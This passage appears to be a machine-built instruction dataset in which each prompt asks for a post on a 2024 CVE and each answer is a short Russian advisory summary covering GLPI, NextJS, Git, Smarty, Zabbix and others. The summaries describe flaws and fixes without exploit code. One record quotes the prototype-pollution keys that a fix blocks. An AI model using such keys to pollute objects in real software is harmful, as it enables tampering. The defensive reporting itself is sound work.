функцияset_req_uri(), в которой исключили формирование URL-адреса на основеHostзаголовка." Write a post on the following topic,SQL Injection уязвимость в GLPI версии 10.0.10,"CVE-CVE-2024-29889 , выявленная вglpi в версии 10.0.10, приводит кSQL Injection. Уязвимость обусловлена возможностью аутентифицированного пользователя воспользоваться уязвимостью SQL-инъекции в функциональной возможности поиска, чтобы изменить данные учетной записи другого пользователя и получить над ними контроль. Висправлениибыла добавлена санитизация значений с помощью функцииSanitizer::sanitize()." Write a post on the following topic,SSRF vulnerability in NextJS versions 13.4 to 14.1.1.,"CVE-CVE-2024-34351 , обнаруженная вNextJS в версии с 13.4 до 14.1.1, приводит кServer-Side Request Forgery (SSRF). Проблема заключалась в возможности злоумышленника перенаправлять запросы на стороне сервера на навязанные URL-адреса. Висправлениибыл изменен порядок определения адреса хоста, в приоритете стало использоваться значение из настроек среды окружения. Описание проблемы, руководство по обновлению отражены вsecurity advisory. Встатьеот специалистовAssetnoteсодержится информация об уязвимостиCVE-2024-34351." Write a post on the following topic,"""Server-Side Request Forgery (SSRF) vulnerability in lobe-chat""","CVE-CVE-2024-32964 , обнаруженная вlobe-chat в версиях до 0.150.5, приводит кServer-Side Request Forgery(SSRF). Проблема заключалась в возможности злоумышленника создавать вредоносные запросы, вызывающиеSSRFбез входа в систему. Данная уязвимость позволяла злоумышленнику взаимодействовать с сервисами внутренней сети. Висправлениибыла добавлена проверка получаемого адреса на принадлежность к адресам внутренней сети с помощью методаisPrivate(...)пакетаnode-ip." Write a post on the following topic,Уязвимость Remote Code Execution в Git версии 2.45.0.,"CVE-CVE-2024-32002 , выявленная вgit в версии 2.45.0, приводит кRemote Code Execution(RCE). Уязвимость обусловлена возможностью злоумышленника создавать репозитории с подмодулями таким образом, чтобы использовать ошибку вGit, из-за которой его можно обманом заставить записывать файлы не в рабочее дерево подмодуля, а в.git/каталог. Висправлениибыли изменены функцииclone_submodule()иdir_contains_only_dotgit()путем добавления проверки существования и отсутствия каталога подмодуля, а также наличия в папке назначения только директории или файла.git." Write a post on the following topic,Server-Side Template Injection in llama_cpp_python,"CVE-CVE-2024-34359 , обнаруженная вllama_cpp_python в версиях с 0.2.30 до 0.2.71, приводит кServer-Side Template Injection (SSTI). Проблема заключалась в возможности злоумышленника внедрения в шаблон на стороне сервера через полезную нагрузку поляMetadataпри загрузке файлов с расширением.gguf. Висправлениибыло изменено окружение для обработки шаблонов с использованием методаImmutableSandboxedEnvironment()." Write a post on the following topic,Уязвимость Arbitrary File Reading в Grav до версий 1.7.46,"CVE-CVE-2024-34082 , выявленная вGrav в версиях до 1.7.46, приводит кArbitrary File Reading. Уязвимость обусловлена возможностью злоумышленника с низким уровнем привилегий и правами на редактирование страниц читать любые файлы сервера, используя синтаксисTwig. Висправлениифункцияread_file(), которая используется для чтения файлов, была внесена в ""черный"" список$bad_twig." Write a post on the following topic,SQL-Injection в Zabbix (CVE-2024-22120),"CVE-CVE-2024-22120 , обнаруженная вZabbix c версии 6.0.0 по 6.0.27, приводит кSQL-Injection. Проблема заключалась в возможности злоумышленника влиять на SQL-запрос через параметрclientip, что могло привести к повышению привилегии от пользователя до администратора. Подробная информация обCVE-2024-22120с примерами реализации различных векторов атак, рекомендациями по обновлению содержится в официальномSecurity Advisory." Write a post on the following topic,CVE-2024-34710: Cross-Site Scripting (XSS) vulnerability in Wiki.js,"CVE-CVE-2024-34710 , обнаруженная вwiki.js в версиях до 2.5.302, приводит кCross-Site Scripting(XSS). Проблема заключалась в возможности злоумышленника внедрить вредоносный JavaScript код, который будет выполняться на стороне клиента. Висправлениивыражения в фигурных скобках ({}) оборачивается тегом

и c атрибутомv-pre, который дляVueустанавливает запрет компиляции выражения." Write a post on the following topic,Уязвимость типа Open redirect в Umbraco CMS.,"CVE-CVE-2024-34071 , выявленная вUmbraco-CMS в версиях от 8.18.5 до 8.18.14, приводит кOpen redirect. Уязвимость обусловлена возможностью злоумышленника, прошедшего проверку подлинности, использовать уязвимый эндпоинт для открытого перенаправления. Висправлениибыла добавлена функцияIsWellFormedWebPath(), которая определяет, правильно ли сформирован предоставленный путь в соответствии с указанным в аргументахUriKind.Relative." Write a post on the following topic,Prototype Pollution vulnerability in apidevtools/json-schema-ref-parser,"CVE-CVE-2024-29651 , обнаруженная вapidevtools/json-schema-ref-parser в версиях 11.0.0 и 11.1.0, приводит кPrototype Pollution. Проблема заключалась в возможности злоумышленника манипулировать прототипом объекта и влиять на поведение объектов, которые были унаследованы от этого прототипа. Висправлениибыла добавлена фильтрация данных, которые проходят слияние, путем применения ""черного"" списка c недопустимыми значениями""__proto__"", ""constructor"", ""prototype""." Write a post on the following topic,Уязвимость в fastify/session приводит к сбою в идентификации и аутентификации,"CVE-CVE-2024-35220 , выявленная вfastify/session в версиях до 10.8.0, приводит кIdentification and Authentication Failures. Уязвимость обусловлена возможностью злоумышленника использовать устаревшие файлы cookie для доступа к сеансам с истекшим сроком действия. Висправленииввели дополнительное полеoriginalExpiresи его проверку на превышение относительно текущей даты, по результатам которого производится сброс сессии." Write a post on the following topic,Обнаружение уязвимости Remote Code Execution в Confluence Data Center and Server.,"CVE-CVE-2024-21683 , обнаруженная вConfluence Data Center and Server в версии 8.9.0, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности аутентифицируемого злоумышленника выполнить произвольный код. Подробная информация оCVE-2024-21683, затронутых версиях, рекомендациях по обновлениям содержится в официальномSecurity Advisory." Write a post on the following topic,Path Traversal vulnerability in openapi-generator,"CVE-CVE-2024-35219 , обнаруженная вopenapi-generator в версиях до 7.5.0, приводит кPath Traversal. Проблема заключалась в возможности злоумышленника через настройкуoutputFolderчитать и удалять файлы, которые находятся на сервере. Висправленииразработчики исключили использование опцииoutputFolderдля построения пути к каталогу." Write a post on the following topic,Уязвимость Code Injection в шаблонизаторе Smarty,"CVE-CVE-2024-35226 , выявленная вшаблонизаторе Smarty в версиях 4.5.3, приводит кCode Injection. Уязвимость обусловлена возможностью злоумышленника внедрить в шаблон исполняемый PHP код через тегextends. Висправлениидля тегаextendбыло удалено использование функцииcompileInclude(), обеспечивающую вставку и исполнение PHP кода." Write a post on the following topic,CVE-2024-36109: XSS уязвимость в Cocalc через Markdown и теги